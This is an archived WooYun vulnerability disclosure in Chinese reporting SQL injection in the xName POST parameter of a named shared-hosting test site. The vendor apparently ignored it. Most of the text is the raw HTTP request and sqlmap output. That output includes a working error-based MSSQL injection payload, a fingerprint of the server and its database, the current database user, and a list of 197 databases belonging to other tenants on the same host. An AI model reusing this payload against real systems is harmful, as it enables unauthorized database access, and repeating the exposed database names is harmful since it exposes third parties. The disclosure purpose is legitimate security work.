乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-06-16: 细节已通知厂商并且等待厂商处理中 2016-06-16: 厂商已查看当前漏洞内容,细节仅向厂商公开 2016-06-21: 厂商已经主动忽略漏洞,细节向公众公开
http://shleju.w114.mc-test.com/
参数:xName
POST /xiangmulistview.aspx HTTP/1.1Content-Length: 11Content-Type: application/x-www-form-urlencodedReferer: http://shleju.w114.mc-test.com:80/Cookie: ASP.NET_SessionId=rslqpvnnhedmgmilulgj3d0zHost: shleju.w114.mc-test.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*xName=1*
sqlmap identified the following injection point(s) with a total of 208 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: xName=1' AND 2788=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2788=2788) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(106)+CHAR(113)))-- NKiI---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2000sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: xName=1' AND 2788=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2788=2788) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(106)+CHAR(113)))-- NKiI---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2000current user: 'sq_yusuan'current database: 'sq_yusuan'current user is DBA: Falsesqlmap resumed the following injection point(s) from stored session:---Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: xName=1' AND 2788=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(106)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2788=2788) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(106)+CHAR(113)))-- NKiI---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2000available databases [197]:[*] master[*] model[*] msdb[*] Northwind[*] pubs[*] sq_1252724821[*] sq_464475463[*] sq_a0910205251[*] sq_abc20131113[*] sq_afanyi2013[*] sq_agarwood[*] sq_aixiu8023[*] sq_almono[*] sq_anadolu[*] sq_angoltech[*] sq_baiyuyin[*] sq_bh2345l[*] sq_bjsbfcsq[*] sq_bocetest[*] sq_cake88zs[*] sq_camming[*] sq_ceob521m[*] sq_ceshisql[*] sq_cf7191810[*] sq_changshi82[*] sq_chsichsi[*] sq_ckts2014[*] sq_cl2013[*] sq_cnwoods[*] sq_comsite[*] sq_cqvitdb[*] sq_czcwan123[*] sq_danson[*] sq_daohang0808[*] sq_dbdg2011[*] sq_dborder[*] sq_ding2013[*] sq_duduge1[*] sq_duomeicc[*] sq_dydongrui1[*] sq_eastlowe[*] sq_eastvendor[*] sq_egrets2000[*] sq_eimshouse[*] sq_EMeal08[*] sq_erpcqwjfccn[*] sq_fanyi021net[*] sq_feiyuxiu[*] sq_fjjyyw2013[*] sq_fjslsp[*] sq_forid317[*] sq_forwardtoys[*] sq_freedomx[*] sq_fxy0831[*] sq_fzgrcycom[*] sq_fzhou223mssql[*] sq_gkbbt2[*] sq_globalshare[*] sq_gywdhg[*] sq_gzdycom[*] sq_gzjspxw123[*] sq_gzxinhaosi2[*] sq_h18918960336[*] sq_hanwei123[*] sq_hlsyh520[*] sq_hmddream[*] sq_hnpgxh[*] sq_hnswms[*] sq_hongstar365[*] sq_huadingit[*] sq_huiyoush[*] sq_hunnintu[*] sq_hxlr2013[*] sq_hymz888[*] sq_iuiyiuiy2[*] sq_jbb365[*] sq_jiayi161[*] sq_jinbo6211[*] sq_jinriyuqid[*] sq_jinrong0808[*] sq_jixingbang[*] sq_jqsy1718[*] sq_jsgwyksw[*] sq_jtwdfw[*] sq_junweisiqwe[*] sq_juyu2015[*] sq_jxg1124[*] sq_kezhang0808[*] sq_kuer1002[*] sq_lantolink[*] sq_lawer360[*] sq_layer100[*] sq_liuyinyu[*] sq_liuyong7520[*] sq_ljstrb[*] sq_longhuyi[*] sq_lsvcom[*] sq_lvegunet[*] sq_lzncic[*] sq_mrmf0001[*] sq_mrzdh2233[*] sq_mswh3way[*] sq_muchendiban[*] sq_myintersys[*] sq_mytestdb[*] sq_mywslw[*] sq_nbyaocai123[*] sq_newswap[*] sq_nf888888[*] sq_NJDT2015[*] sq_ntim20130930[*] sq_pailew[*] sq_pingou[*] sq_pjkc[*] sq_ptsgxq[*] sq_pxid2013[*] sq_qest2013[*] sq_qiaoyf[*] sq_qichao3000[*] sq_qiuh9208[*] sq_qq1012647[*] sq_qq503037121[*] sq_qqqnweb[*] sq_rongyou2014[*] sq_shanghu2013[*] sq_shazhongq[*] sq_shboyon2[*] sq_shchezhixiao[*] sq_shdashequ[*] sq_shengzhaobio[*] sq_shiyin520[*] sq_shjmkq2000[*] sq_shkj140813[*] sq_shkj150425[*] sq_shkj150721[*] sq_shkj151016[*] sq_shkj151026[*] sq_shkj151217[*] sq_shkj160503[*] sq_shkj160509[*] sq_shkj160525[*] sq_shkj160603[*] sq_shujuguanli[*] sq_shujuku2013[*] sq_shyunwen20131[*] sq_sinee2016[*] sq_siteserver[*] sq_sitytech2013[*] sq_sql2000date[*] sq_sql2000wd[*] sq_sqltopcourage[*] sq_ssdd2013[*] sq_stgdsyxx[*] sq_sunpcdb1[*] sq_sunshine2[*] sq_talentcorpdb1[*] sq_tbcxmb[*] sq_tcby002[*] sq_tcdq1974[*] sq_testlaskdjf[*] sq_tger258369[*] sq_tingyou123[*] sq_ufolbb2013[*] sq_ujoygroup[*] sq_w123456[*] sq_wczx98[*] sq_web8980[*] sq_wem520[*] sq_wesleydata[*] sq_wlcyjd[*] sq_wxpneumdata[*] sq_wyxfl1[*] sq_x2013l[*] sq_xad20140530[*] sq_xdpc111[*] sq_xifashui[*] sq_xiqing3[*] sq_xnkq2013[*] sq_yachuan[*] sq_yanglan21v[*] sq_yangyang[*] sq_yanvps[*] sq_yczedu[*] sq_yfplastic001[*] sq_yuanbxjz[*] sq_yuetong[*] sq_yusuan[*] sq_yuyue[*] sq_yzspfx[*] sq_zenrebrand[*] sq_zhangma[*] sq_zhuanyi1[*] sq_zjp03701[*] sq_zjtonglicom[*] sq_zslpms13[*] sq_zukexbaicai[*] tempdb
危害等级:无影响厂商忽略
忽略时间:2016-06-21 17:30
漏洞Rank:15 (WooYun评价)
暂无